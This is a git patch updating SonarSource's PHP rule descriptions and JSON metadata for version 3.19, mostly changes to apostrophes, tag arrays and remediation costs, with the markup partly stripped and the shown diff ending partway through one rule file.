From 482f7d2e43d2d6f6e777e56386e6591f7a44bcfb Mon Sep 17 00:00:00 2001 
From: Nils Werner <64034005+nils-werner-sonarsource@users.noreply.github.com> Date: Mon, 16 Aug 2021 14:56:41 +0200 Subject: [PATCH] Update rule metdata for version 3.19 (#815) --- .../org/sonar/l10n/php/rules/php/S1066.html | 2 +- .../org/sonar/l10n/php/rules/php/S1067.html | 2 +- .../org/sonar/l10n/php/rules/php/S1075.html | 4 +- .../org/sonar/l10n/php/rules/php/S1075.json | 4 +- .../org/sonar/l10n/php/rules/php/S110.html | 4 +- .../org/sonar/l10n/php/rules/php/S1105.html | 2 +- .../org/sonar/l10n/php/rules/php/S1109.html | 2 +- .../org/sonar/l10n/php/rules/php/S1110.html | 2 +- .../org/sonar/l10n/php/rules/php/S1117.html | 2 +- .../org/sonar/l10n/php/rules/php/S1121.html | 2 +- .../org/sonar/l10n/php/rules/php/S1131.html | 2 +- .../org/sonar/l10n/php/rules/php/S1134.json | 4 + .../org/sonar/l10n/php/rules/php/S1135.json | 4 + .../org/sonar/l10n/php/rules/php/S1142.html | 2 +- .../org/sonar/l10n/php/rules/php/S1145.html | 2 +- .../org/sonar/l10n/php/rules/php/S1226.json | 6 +- .../org/sonar/l10n/php/rules/php/S126.json | 4 +- .../org/sonar/l10n/php/rules/php/S1264.html | 2 +- .../org/sonar/l10n/php/rules/php/S127.html | 2 +- .../org/sonar/l10n/php/rules/php/S128.html | 2 +- .../org/sonar/l10n/php/rules/php/S131.html | 2 +- .../org/sonar/l10n/php/rules/php/S1311.json | 4 +- .../org/sonar/l10n/php/rules/php/S1313.html | 8 +- .../org/sonar/l10n/php/rules/php/S134.html | 2 +- .../org/sonar/l10n/php/rules/php/S138.html | 2 +- .../org/sonar/l10n/php/rules/php/S1451.html | 2 +- .../org/sonar/l10n/php/rules/php/S1451.json | 4 +- .../org/sonar/l10n/php/rules/php/S1523.html | 4 +- .../org/sonar/l10n/php/rules/php/S1578.html | 2 +- .../org/sonar/l10n/php/rules/php/S1599.html | 2 +- .../org/sonar/l10n/php/rules/php/S1600.html | 40 +++-- .../org/sonar/l10n/php/rules/php/S1603.html | 2 +- .../org/sonar/l10n/php/rules/php/S1656.json | 4 +- .../org/sonar/l10n/php/rules/php/S1697.json | 4 +- .../org/sonar/l10n/php/rules/php/S1751.json | 4 +- 
.../org/sonar/l10n/php/rules/php/S1757.json | 2 +- .../org/sonar/l10n/php/rules/php/S1763.html | 2 +- .../org/sonar/l10n/php/rules/php/S1764.json | 4 +- .../org/sonar/l10n/php/rules/php/S1765.html | 4 +- .../org/sonar/l10n/php/rules/php/S1780.json | 2 +- .../org/sonar/l10n/php/rules/php/S1788.html | 2 +- .../org/sonar/l10n/php/rules/php/S1799.html | 2 +- .../org/sonar/l10n/php/rules/php/S1799.json | 4 +- .../org/sonar/l10n/php/rules/php/S1848.json | 4 +- .../org/sonar/l10n/php/rules/php/S1854.html | 2 +- .../org/sonar/l10n/php/rules/php/S1862.html | 6 +- .../org/sonar/l10n/php/rules/php/S1871.html | 4 +- .../org/sonar/l10n/php/rules/php/S1998.html | 8 +- .../org/sonar/l10n/php/rules/php/S2000.json | 2 +- .../org/sonar/l10n/php/rules/php/S2001.html | 146 ++++++++++-------- .../org/sonar/l10n/php/rules/php/S2002.html | 2 +- .../org/sonar/l10n/php/rules/php/S2003.html | 2 +- .../org/sonar/l10n/php/rules/php/S2003.json | 4 +- .../org/sonar/l10n/php/rules/php/S2007.html | 2 +- .../org/sonar/l10n/php/rules/php/S2010.json | 2 +- .../org/sonar/l10n/php/rules/php/S2011.html | 2 +- .../org/sonar/l10n/php/rules/php/S2014.json | 4 +- .../org/sonar/l10n/php/rules/php/S2036.html | 2 +- .../org/sonar/l10n/php/rules/php/S2044.html | 2 +- .../org/sonar/l10n/php/rules/php/S2050.html | 78 +++++----- .../org/sonar/l10n/php/rules/php/S2068.html | 6 +- .../org/sonar/l10n/php/rules/php/S2070.json | 4 +- .../org/sonar/l10n/php/rules/php/S2077.html | 2 +- .../org/sonar/l10n/php/rules/php/S2092.html | 6 +- .../org/sonar/l10n/php/rules/php/S2187.html | 2 +- .../org/sonar/l10n/php/rules/php/S2201.html | 4 +- .../org/sonar/l10n/php/rules/php/S2201.json | 4 +- .../org/sonar/l10n/php/rules/php/S2234.json | 4 +- .../org/sonar/l10n/php/rules/php/S2245.html | 5 + .../org/sonar/l10n/php/rules/php/S2245.json | 6 +- .../org/sonar/l10n/php/rules/php/S2251.html | 2 +- .../org/sonar/l10n/php/rules/php/S2251.json | 4 +- .../org/sonar/l10n/php/rules/php/S2255.html | 2 +- 
.../org/sonar/l10n/php/rules/php/S2255.json | 4 +- .../org/sonar/l10n/php/rules/php/S2612.html | 2 +- .../org/sonar/l10n/php/rules/php/S2699.html | 2 +- .../org/sonar/l10n/php/rules/php/S2737.html | 2 +- .../org/sonar/l10n/php/rules/php/S2755.html | 53 ++++--- .../org/sonar/l10n/php/rules/php/S2757.json | 6 +- .../org/sonar/l10n/php/rules/php/S2761.json | 4 +- .../org/sonar/l10n/php/rules/php/S2830.html | 2 +- .../org/sonar/l10n/php/rules/php/S2918.html | 6 +- .../org/sonar/l10n/php/rules/php/S2964.json | 4 +- .../org/sonar/l10n/php/rules/php/S3011.json | 4 +- .../org/sonar/l10n/php/rules/php/S3330.html | 6 +- .../org/sonar/l10n/php/rules/php/S3331.html | 4 +- .../org/sonar/l10n/php/rules/php/S3331.json | 4 +- .../org/sonar/l10n/php/rules/php/S3333.html | 2 +- .../org/sonar/l10n/php/rules/php/S3334.html | 2 +- .../org/sonar/l10n/php/rules/php/S3336.html | 8 +- .../org/sonar/l10n/php/rules/php/S3337.html | 2 +- .../org/sonar/l10n/php/rules/php/S3338.html | 2 +- .../org/sonar/l10n/php/rules/php/S3338.json | 4 +- .../org/sonar/l10n/php/rules/php/S3358.html | 2 +- .../org/sonar/l10n/php/rules/php/S3699.json | 6 +- .../org/sonar/l10n/php/rules/php/S3801.html | 2 +- .../org/sonar/l10n/php/rules/php/S3923.html | 2 +- .../org/sonar/l10n/php/rules/php/S3923.json | 4 +- .../org/sonar/l10n/php/rules/php/S3981.html | 4 +- .../org/sonar/l10n/php/rules/php/S3981.json | 4 +- .../org/sonar/l10n/php/rules/php/S4142.json | 4 +- .../org/sonar/l10n/php/rules/php/S4423.html | 4 + .../org/sonar/l10n/php/rules/php/S4423.json | 3 +- .../org/sonar/l10n/php/rules/php/S4426.html | 10 +- .../org/sonar/l10n/php/rules/php/S4426.json | 3 +- .../org/sonar/l10n/php/rules/php/S4433.html | 2 +- .../org/sonar/l10n/php/rules/php/S4502.html | 4 +- .../org/sonar/l10n/php/rules/php/S4508.html | 10 +- .../org/sonar/l10n/php/rules/php/S4508.json | 4 +- .../org/sonar/l10n/php/rules/php/S4524.json | 4 +- .../org/sonar/l10n/php/rules/php/S4784.html | 8 +- .../org/sonar/l10n/php/rules/php/S4784.json | 6 +- 
.../org/sonar/l10n/php/rules/php/S4787.html | 8 +- .../org/sonar/l10n/php/rules/php/S4787.json | 4 +- .../org/sonar/l10n/php/rules/php/S4790.html | 8 +- .../org/sonar/l10n/php/rules/php/S4790.json | 3 +- .../org/sonar/l10n/php/rules/php/S4792.html | 10 +- .../org/sonar/l10n/php/rules/php/S4818.json | 4 +- .../org/sonar/l10n/php/rules/php/S4823.json | 4 +- .../org/sonar/l10n/php/rules/php/S4828.html | 4 +- .../org/sonar/l10n/php/rules/php/S4829.html | 2 +- .../org/sonar/l10n/php/rules/php/S4829.json | 4 +- .../org/sonar/l10n/php/rules/php/S4830.html | 8 +- .../org/sonar/l10n/php/rules/php/S4830.json | 3 +- .../org/sonar/l10n/php/rules/php/S4833.html | 4 +- .../org/sonar/l10n/php/rules/php/S4834.html | 8 +- .../org/sonar/l10n/php/rules/php/S4834.json | 4 +- .../org/sonar/l10n/php/rules/php/S5042.html | 4 +- .../org/sonar/l10n/php/rules/php/S5122.html | 2 +- .../org/sonar/l10n/php/rules/php/S5328.html | 7 +- .../org/sonar/l10n/php/rules/php/S5328.json | 3 +- .../org/sonar/l10n/php/rules/php/S5332.html | 6 + .../org/sonar/l10n/php/rules/php/S5332.json | 6 - .../org/sonar/l10n/php/rules/php/S5527.html | 12 +- .../org/sonar/l10n/php/rules/php/S5527.json | 3 +- .../org/sonar/l10n/php/rules/php/S5542.html | 22 +-- .../org/sonar/l10n/php/rules/php/S5542.json | 7 +- .../org/sonar/l10n/php/rules/php/S5547.html | 2 +- .../org/sonar/l10n/php/rules/php/S5547.json | 7 +- .../org/sonar/l10n/php/rules/php/S5632.json | 4 +- .../org/sonar/l10n/php/rules/php/S5693.html | 2 +- .../org/sonar/l10n/php/rules/php/S5779.json | 4 + .../org/sonar/l10n/php/rules/php/S5783.json | 4 + .../org/sonar/l10n/php/rules/php/S5785.html | 2 +- .../org/sonar/l10n/php/rules/php/S5785.json | 4 + .../org/sonar/l10n/php/rules/php/S5808.html | 2 +- .../org/sonar/l10n/php/rules/php/S5863.html | 2 +- .../org/sonar/l10n/php/rules/php/S5876.html | 2 +- .../org/sonar/l10n/php/rules/php/S5899.html | 4 +- .../org/sonar/l10n/php/rules/php/S881.json | 4 +- .../org/sonar/l10n/php/rules/php/S930.json | 7 +- 
sonarpedia.json | 2 +-
152 files changed, 455 insertions(+), 443 deletions(-)
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1066.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1066.html
index a214367499..9271e2689d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1066.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1066.html
@@ -1,4 +1,4 @@ -
Merging collapsible if
statements increases the code's readability.
Merging collapsible if
statements increases the code’s readability.
if (condition1) {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html
index 71a2a57ce6..891574fa06 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1067.html
@@ -1,6 +1,6 @@
The complexity of an expression is defined by the number of
-&&
,||
andcondition ? ifTrue : ifFalse
operators it contains.A single expression's complexity should not become too high to keep the code readable.
+A single expression’s complexity should not become too high to keep the code readable.
Noncompliant Code Example
With the default threshold value of 3
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html
index 638640771d..1e2d730c75 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1075.html
@@ -1,9 +1,9 @@
Hard coding a URI makes it difficult to test a program: path literals are not always portable across operating systems, a given absolute path may not exist on a specific test environment, a specified Internet URL may not be available when executing the tests, production environment filesystems
-usually differ from the development environment, ...etc. For all those reasons, a URI should never be hard coded. Instead, it should be replaced by
+usually differ from the development environment, …etc. For all those reasons, a URI should never be hard coded. Instead, it should be replaced by
customizable parameter.
Further even if the elements of a URI are obtained dynamically, portability can still be limited if the path-delimiters are hard-coded.
-This rule raises an issue when URI's or path delimiters are hard coded.
+This rule raises an issue when URI’s or path delimiters are hard coded.
See
Inheritance is certainly one of the most valuable concepts in object-oriented programming. It's a way to compartmentalize and reuse code by +
Inheritance is certainly one of the most valuable concepts in object-oriented programming. It’s a way to compartmentalize and reuse code by creating collections of attributes and behaviors called classes which can be based on previously created classes. But abusing this concept by creating a deep inheritance tree can lead to very complex and unmaintainable source code. Most of the time a too deep inheritance tree is due to bad object oriented design which has led to systematically use 'inheritance' when for instance 'composition' would suit better.
-This rule raises an issue when the inheritance tree, starting from Object
has a greater depth than is allowed.
This rule raises an issue when the inheritance tree, starting from Object
has a greater depth than is allowed.
When blocks are inlined (left and right curly braces on the same line), no issue is triggered.
+When blocks are inlined (left and right curly braces on the same line), no issue is triggered.
if(condition) {doSomething();}
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html
index 3c4039f9bb..95698c23d4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1109.html
@@ -12,7 +12,7 @@
When blocks are inlined (open and close curly braces on the same line), no issue is triggered.
+When blocks are inlined (open and close curly braces on the same line), no issue is triggered.
if(condition) {doSomething();}
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html
index 2e10cf7e7f..b927fe0349 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1110.html
@@ -1,5 +1,5 @@
The use of parentheses, even those not required to enforce a desired order of operations, can clarify the intent behind a piece of code. But -redundant pairs of parentheses could be misleading, and should be removed.
+redundant pairs of parentheses could be misleading, and should be removed.$x = ($y / 2 + 1); // Compliant even if the parenthesis are ignored by the compiler
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html
index a2d462dc21..0beb73d463 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1117.html
@@ -1,5 +1,5 @@
Overriding or shadowing a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of
-code. Further, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.
+code. Further, it could lead maintainers to introduce bugs because they think they’re using one variable but are really using another.Noncompliant Code Example
class Foo {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html
index 7b5071d9f3..c0e2d68b67 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1121.html
@@ -11,7 +11,7 @@-
if ($val && check()) { }or
+or
if ($val == value() && check()) { // Perhaps in fact the equality operator was expected }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html
index 642072f955..c69359385a 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1131.html
@@ -1,7 +1,7 @@
Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same file.
If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the -opportunity to do so.
+opportunity to do so.Exceptions
Lines containing only whitespaces.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json
index ad51186f5a..ebf8149c01 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1134.json
@@ -2,6 +2,10 @@
"title": "Track uses of \"FIXME\" tags",
"type": "CODE_SMELL",
"status": "ready",
+ "remediation": {
+ "func": "Constant\/Issue",
+ "constantCost": "0min"
+ },
"tags": [
"cwe"
],
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json
index b1a76c6603..651fb0d171 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1135.json
@@ -2,6 +2,10 @@
"title": "Track uses of \"TODO\" tags",
"type": "CODE_SMELL",
"status": "ready",
+ "remediation": {
+ "func": "Constant\/Issue",
+ "constantCost": "0min"
+ },
"tags": [
"cwe"
],
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html
index 9a98800d9d..d746c59785 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1142.html
@@ -1,4 +1,4 @@
-Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a
Having too many return statements in a function increases the function’s essential complexity because the flow of execution is broken each time a return statement is encountered. This makes it harder to read and understand the logic of the function.
Noncompliant Code Example
With the default threshold of 3:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html
index 20ae33264a..c16a874146 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1145.html
@@ -1,6 +1,6 @@-
if
statements with conditions that are always false have the effect of making blocks of code non-functional.if
statements with conditions that are always true are completely redundant, and make the code less readable.There are three possible causes for the presence of such code:
+There are three possible causes for the presence of such code:
When only the condition expression is defined in a for
loop, and the initialization and increment expressions are missing, a
-while
loop should be used instead to increase readability.
while
loop should be used instead to increase readability.
for (;condition;) { /*...*/ }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html
index 1d7b274336..5d278c4b05 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S127.html
@@ -1,5 +1,5 @@
A
+ending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins.for
loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and -ending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins.Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the introduction of errors in the future.
This rule tracks three types of non-invariant stop conditions:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html index a262881045..541a225e1b 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S128.html @@ -1,5 +1,5 @@When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While -this is sometimes intentional, it often is a mistake which leads to unexpected behavior.
+this is sometimes intentional, it often is a mistake which leads to unexpected behavior.Noncompliant Code Example
switch ($myVariable) {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html
index 6249c555d8..a0aa015be3 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S131.html
@@ -1,6 +1,6 @@
The requirement for a final
+should still be used because there is no guarantee that thecase default
clause is defensive programming. The clause should either take appropriate action, or contain a suitable comment as to why no action is taken. Even when theswitch
covers all current values of anenum
, a default case -should still be used because there is no guarantee that theenum
won't be extended.enum
won’t be extended.Noncompliant Code Example
switch ($param) { //missing default clause
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json
index a3948e2eff..d83e986e1a 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1311.json
@@ -8,9 +8,7 @@
"linearOffset": "10min",
"linearFactor": "1min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1311",
"sqKey": "S1311",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html
index 380ff21c3d..e7a7d771ba 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1313.html
@@ -3,7 +3,7 @@
Today's services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always +
Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:
Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which -will increase an attack's impact.
+will increase an attack’s impact.The disclosed IP address is sensitive, e.g.:
There is a risk if you answered yes to any of these questions.
Don't hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar +
Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.
Nested if
, for
, while
, switch
, and try
statements are key ingredients for making
-what's known as "Spaghetti code".
Such code is hard to read, refactor and therefore maintain.
With the default threshold of 3:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html index ec399fd828..aba68ac525 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S138.html @@ -1,5 +1,5 @@A function that grows too large tends to aggregate too many responsibilities.
-Such functions inevitably become harder to understand and therefore harder to maintain.
+Such functions inevitably become harder to understand and therefore harder to maintain.
Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.
Those smaller functions will not only be easier to understand, but also probably easier to test.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html index 8d4f08d277..d490cb4dff 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.html @@ -1,4 +1,4 @@ -Each source file should start with a header stating file ownership and the license which must be used to distribute the application.
+Each source file should start with a header stating file ownership and the license which must be used to distribute the application.
This rule must be fed with the header text that is expected at the beginning of every file.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json index cf5755a9e7..9f44cff97e 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1451.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "5min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Blocker", "ruleSpecification": "RSPEC-1451", "sqKey": "S1451", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html index 493f835f3a..ff231e0ef0 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1523.html @@ -6,13 +6,13 @@Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (exemple: XSS -attack) and have a huge impact on an application's security.
+attack) and have a huge impact on an application’s security.This rule marks for review each occurrence of the
eval
function. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html index 3ebcae95e7..e3ed0ac76d 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1578.html @@ -1,5 +1,5 @@Shared coding conventions allow teams to collaborate effectively. For that reason, file names should conform to a defined standard. This rule -raises an issue when the names of analyzed files don't match the provided regular expression.
+raises an issue when the names of analyzed files don’t match the provided regular expression.PHP's "variable variables" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code.
+PHP’s "variable variables" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code.
$var = 'foo';
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html
index e52fd04f1a..be7cfef1a4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1600.html
@@ -1,41 +1,47 @@
The following predefined variables are deprecated and should be replaced by the new versions:
Replace | With | ||
---|---|---|---|
$HTTP_SERVER_VARS | -$_SERVER | +$HTTP_SERVER_VARS |
+ $_SERVER |
$HTTP_GET_VARS | -$_GET | +$HTTP_GET_VARS |
+ $_GET |
$HTTP_POST_VARS | -$_POST | +$HTTP_POST_VARS |
+ $_POST |
$HTTP_POST_FILES | -$_FILES | +$HTTP_POST_FILES |
+ $_FILES |
$HTTP_SESSION_VARS | -$_SESSION | +$HTTP_SESSION_VARS |
+ $_SESSION |
$HTTP_ENV_VARS | -$_ENV | +$HTTP_ENV_VARS |
+ $_ENV |
$HTTP_COOKIE_VARS | -$_COOKIE | +$HTTP_COOKIE_VARS |
+ $_COOKIE |
$php_errormsg | -error_get_last() | +$php_errormsg |
+ error_get_last() |
In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and
the __construct
method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named
-__construct
as the class constructor.
__construct
as the class constructor.
This rule rule raises an issue for each method with the same name as the enclosing class.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json index 66b1c82c8f..0cd4688fb1 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1656.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "3min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-1656", "sqKey": "S1656", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json index 8a3cc299f2..d02dd2969b 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1697.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "2min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-1697", "sqKey": "S1697", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json index 501baab21a..b3dc00ddd7 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1751.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "5min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-1751", "sqKey": "S1751", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json index eb962e0e7b..df685112dc 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1757.json @@ -1,5 +1,5 @@ { - "title": "\"Some statements (return
,break
,continue
,goto
,switch
) andthrow
expressions move control flow out of the current code block. So any unlabeled statements that come after such a jump are unreachable, and either this -dead code should be removed, or the logic should be corrected. +dead code should be removed, or the logic should be corrected.Noncompliant Code Example
function fun($a) { diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json index 1edf95e6ca..7895a3a99e 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1764.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "2min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-1764", "sqKey": "S1764", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html index d0a6da49f2..22827bf854 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1765.html @@ -1,5 +1,5 @@ --The PHP 4 method of declaring a variable, using the
var
keyword, was deprecated in early versions of PHP 5. Even though it's not -considered deprecated in the most recent versions, it's nonetheless not best practice to use it. Whenvar
does appear, it is interpreted +The PHP 4 method of declaring a variable, using the
var
